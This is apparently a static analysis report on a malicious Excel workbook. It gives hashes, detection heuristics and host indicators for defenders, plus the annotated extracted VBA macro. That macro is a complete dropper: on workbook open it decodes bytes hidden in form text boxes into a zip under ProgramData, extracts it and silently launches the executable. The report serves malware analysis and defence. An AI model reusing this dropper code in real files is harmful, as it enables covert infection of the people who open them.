Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b29691ac40b8bbb1…

MALICIOUS

Office (OLE)

428.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2021-02-23
MD5: 5158c5c17862225a86c8a4f36f054ae2 SHA-1: 6da27200f473f8c55bb125f68314eecb2219c3dd SHA-256: b29691ac40b8bbb12b13e84641ad20583d1387ca356850aa7b5e76b0f6c76806
236 Risk Score

Heuristics 7

  • ClamAV: Xls.Dropper.Agent-7431632-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7431632-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell path_Nave_file, vbNormalNoFocus
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set oApp = CreateObject("Shell.Application")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        fldr_Nave_name = Environ$("ALLUSERSPROFILE") & "\Media-List\"

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4272 bytes
SHA-256: a80e19311ac1ab6d30e096a91202cad7142f059f0cda95e93912b25db56d644b
Preview script
First 1,000 lines of the extracted script
' Export header for the "ThisWorkbook" document module (see the VB_Name line).
' These Attribute lines are module metadata carried along by the source extraction,
' not executable macro code; the module's only procedure follows below.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-execution entry point: runs as soon as the workbook is opened with macros enabled
' (the OLE_VBA_WBOPEN finding). Control goes straight to userNaveLoadr in Module1, i.e. the
' drop-and-run routine executes before the user sees anything. Afterwards Sheet3 is un-hidden
' and copied - presumably the decoy content presented to the user; confirm against the workbook.
Private Sub Workbook_Open()
  Call userNaveLoadr
  Sheet3.Visible = xlSheetVisible
 Sheet3.Copy
 End Sub

' Export headers for the three worksheet modules and for Module1. The Sheet1/Sheet2/Sheet3
' modules contain attributes only - no procedures - in this extract; Sheet3 is the sheet that
' Workbook_Open un-hides and copies. Module1 holds all of the procedural code that follows.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' Recorded-style worksheet formatting macro: turns the range at $I$6 into a table named
' "Table1" and applies a solid interior fill to cell R9. It contains no shell/object/download
' tokens and is not called by any other procedure in this listing (Macro15 below is a near
' duplicate targeting R7). Likely filler from the template the lure was built on - confirm.
Sub Macro1()
  
    ActiveSheet.ListObjects.Add(xlSrcRange, Range("$I$6"), , xlNo).Name = "Table1"
    Range("R9").Select
    With Selection.Interior
        .Pattern = xlSolid
        .PatternColorIndex = xlAutomatic
        .TintAndShade = 1
        .PatternTintAndShade = 0
    End With
 
    
    
End Sub

 

' Dropper routine, invoked from Workbook_Open. What the visible code does, in order:
'   1. builds a working folder %ALLUSERSPROFILE%\Media-List\ (ALLUSERSPROFILE is normally
'      C:\ProgramData) and creates it if it does not exist (the OLE_VBA_ENVIRON finding);
'   2. chooses one of two text boxes on userForm based on the Application.OperatingSystem
'      string - the "6.02"/"6.03" substrings are presumably a Windows 8 / 8.1 version
'      check selecting a different embedded payload; confirm by inspecting the form data;
'   3. parses the chosen text box as a dash-separated list of numeric byte values and
'      writes the resulting byte array to tbvrarthsa.zip in that folder;
'   4. if tbvrarthsa.exe is not already present, extracts the archive via unNavezip;
'   5. launches tbvrarthsa.exe with Shell (the OLE_VBA_SHELL finding).
' The payload bytes themselves are NOT in this listing: they sit in the userForm control
' values, which are stored separately from the VBA source and are not part of this extract.
' The form is never shown by any code here. Host-side indicators for defenders: creation of
' the Media-List folder and the .zip/.exe pair under ProgramData, and Excel spawning that
' executable as a child process. No Option Explicit is visible; vl (the loop variable) is
' never declared, and byt() is declared but never used.
Sub userNaveLoadr()

    Dim path_Nave_file As String
    Dim file_Nave_name  As String
    Dim zip_Nave_file  As Variant
    Dim fldr_Nave_name  As Variant
    
    Dim byt() As Byte
    
    Dim ar1Nave() As String
    
    ' Base name shared by the dropped archive and the executable extracted from it.
    file_Nave_name = "tbvrarthsa"
    
    
    ' Drop location is derived from an environment variable rather than hard-coded.
    fldr_Nave_name = Environ$("ALLUSERSPROFILE") & "\Media-List\"
    
    If Dir(fldr_Nave_name, vbDirectory) = "" Then
        MkDir (fldr_Nave_name)
    End If
     
    
    zip_Nave_file = fldr_Nave_name & file_Nave_name & ".zip"
    
    path_Nave_file = fldr_Nave_name & file_Nave_name & ".exe"
    
      
    
    ' OS-dependent payload selection: TextBox2 when the version string contains
    ' "6.02" or "6.03", TextBox1 otherwise. Both text boxes are read from userForm.
    If InStr(Application.OperatingSystem, "6.02") > 0 Or InStr(Application.OperatingSystem, "6.03") > 0 Then
        ar1Nave = Split(userForm.TextBox2.Text, "-")
    Else
        ar1Nave = Split(userForm.TextBox1.Text, "-")
    End If
    
    Dim btsNave() As Byte
    
    ' Used as the array index below; a Double here is coerced to an integer bound by VBA.
    Dim linNave As Double
    
    linNave = 0
    
    ' Rebuild the archive one byte at a time from the text encoding (ReDim Preserve per element).
    For Each vl In ar1Nave
        ReDim Preserve btsNave(linNave)
    
        btsNave(linNave) = CByte(vl)
        
        linNave = linNave + 1
    Next

    
      
    ' Write the reconstructed bytes to disk as the .zip file.
    Open zip_Nave_file For Binary Access Write As #2
         Put #2, , btsNave
    Close #2
   
    
    ' Extract only if the executable is not already on disk (Dir returns "" when absent).
     If Len(Dir(path_Nave_file)) = 0 Then
        Call unNavezip(zip_Nave_file, fldr_Nave_name)
    End If


    ' Execution stage: vbNormalNoFocus starts the process in a normal window without focus.
    Shell path_Nave_file, vbNormalNoFocus
    
    
End Sub

' Near-duplicate of Macro1: adds a table named "Table1" at $I$6 and solid-fills cell R7
' (Macro1 targets R9). No shell/object/download tokens, and not called by any other
' procedure in this listing; likely template filler - confirm.
Sub Macro15()
  
    ActiveSheet.ListObjects.Add(xlSrcRange, Range("$I$6"), , xlNo).Name = "Table1"
    Range("R7").Select
    With Selection.Interior
        .Pattern = xlSolid
        .PatternColorIndex = xlAutomatic
        .TintAndShade = 1
        .PatternTintAndShade = 0
    End With
 
    
    
End Sub

 ' Archive extraction helper called from userNaveLoadr.
 '   Fname          - path of the .zip written by the caller
 '   FileNameFolder - destination folder (the Media-List drop folder)
 ' Uses the Shell.Application COM object (the OLE_VBA_CREATEOBJ finding) to copy every
 ' item of the archive namespace into the folder, so no external unzip tool is needed.
 ' The &H4 option to CopyHere suppresses the progress dialog (per the Folder.CopyHere
 ' flag documentation) - worth confirming when reproducing in a sandbox.
 ' FSO is declared but never used.
 Sub unNavezip(Fname As Variant, FileNameFolder As Variant)
    Dim FSO As Object
    
    Dim oApp As Object
    
    
    'Extract the files into the Destination folder
    Set oApp = CreateObject("Shell.Application")
    
    oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, &H4

    
End Sub




' Export header for the "userForm" form module. This is the form whose TextBox1 / TextBox2
' contents userNaveLoadr decodes into the dropped archive; the control values (the actual
' payload bytes) are stored with the form data, not in this source extract, and no code in
' the listing ever displays the form.
Attribute VB_Name = "userForm"
Attribute VB_Base = "0{3E45A008-C864-4119-8A34-06DA6AE727AD}{E2E34E71-CC29-42F0-A048-256E3B21FF84}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False












































' Empty change handler for TextBox1. The control's value is only ever read by
' userNaveLoadr; nothing here reacts to edits. No handler exists for TextBox2.
Private Sub TextBox1_Change()

End Sub

' Empty change handler for a control named weHafiBox, which is not referenced anywhere
' else in this listing - presumably a leftover or decoy control on the form; confirm
' against the form layout.
Private Sub weHafiBox_Change()

End Sub